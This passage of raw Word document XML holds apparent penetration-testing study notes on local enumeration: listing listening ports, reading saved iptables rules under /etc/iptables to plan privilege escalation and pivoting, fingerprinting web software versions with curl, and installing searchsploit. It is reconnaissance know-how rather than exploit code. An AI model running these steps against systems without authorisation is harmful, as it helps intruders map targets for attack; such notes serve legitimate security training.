        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Only listening TCP/UDP sockets, with process info — great for finding open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A19">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3cy07ruiij2o" w:id="366"/>
      <w:bookmarkEnd w:id="366"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Firewall enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A1C">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In general, we're primarily interested in a firewall's state, profile, and rules during the remote exploitation phase of an assessment. However, this information can also be useful during privilege escalation. For example, if a network service is not remotely accessible because it is blocked by the firewall, it is generally accessible locally via the loopback interface. If we can interact with these services locally, we may be able to exploit them to escalate our privileges on the local system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A1D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During this phase, we can also gather information about inbound and outbound port filtering to facilitate port forwarding and tunneling when it's time to pivot to an internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A1E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Linux-based systems, we must have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges to list firewall rules with</w:t>
      </w:r>
      <w:hyperlink r:id="rId874">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId875">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">iptables</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, depending on how the firewall is configured, we may be able to glean information about the rules as a standard user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A1F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId876">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId877">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">iptables-persistent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> package on Debian Linux saves firewall rules in specific files under </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/iptables</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default. These files are used by the system to restore</w:t>
      </w:r>
      <w:hyperlink r:id="rId878">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId879">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">netfilter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rules at boot time. These files are often left with weak permissions, allowing them to be read by any local user on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A20">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also search for files created by the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables-save</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, which is used to dump the firewall configuration to a file specified by the user. This file is then usually used as input for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables-restore</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and used to restore the firewall rules at boot time. If a system administrator had ever run this command, we could search the configuration directory (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) or grep the file system for iptables commands to locate the file. If the file has insecure permissions, we could use the contents to infer the firewall configuration rules running on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2425700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="124" name="image144.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image144.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88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2A23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/iptables/rules.v4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this file is read-only by any users other than root, we can inspect its contents. We'll notice a non-default rule that explicitly allows the destination port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1999</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This configuration detail stands out and should be noted for later investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A26">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iqaushfija2g" w:id="367"/>
      <w:bookmarkEnd w:id="367"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1253"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1253"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Exploit-DB and Rapid7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1253"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search on google with "CVE" or "Github"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A30">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v4shywumea6m" w:id="368"/>
      <w:bookmarkEnd w:id="368"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A31">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h6fk0d8e0ec6" w:id="369"/>
      <w:bookmarkEnd w:id="369"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Version of software on website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1310"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://[IP] | grep "version"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1310"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scroll through the output for red text that says "version"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1310"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or try another key word if that doesn't work, like the name of the application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A35">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1310"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/documentation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /README.md</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A38">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A39">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sq6n2lifrnhs" w:id="370"/>
      <w:bookmarkEnd w:id="370"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rpjjy5ypewzo" w:id="371"/>
      <w:bookmarkEnd w:id="371"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, update the local copy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update &amp;&amp; sudo apt install exploitdb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="325"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The above command updates the local copy of the Exploit Database archive under /usr/share/exploitdb/. This directory is split into two major sections, exploits and shellcodes. The /usr/share/exploitdb/ directory contains CSV files for each of the exploits and shellcodes directories. Each CSV file contains the file information of all files within their respective subdirectories. These CSV files contain similar information to the Exploit DB website, such as the EDB-ID, title, author, platform, and other information we covered previously.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1435100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="455" name="image455.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image455.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId881"/>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2A41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
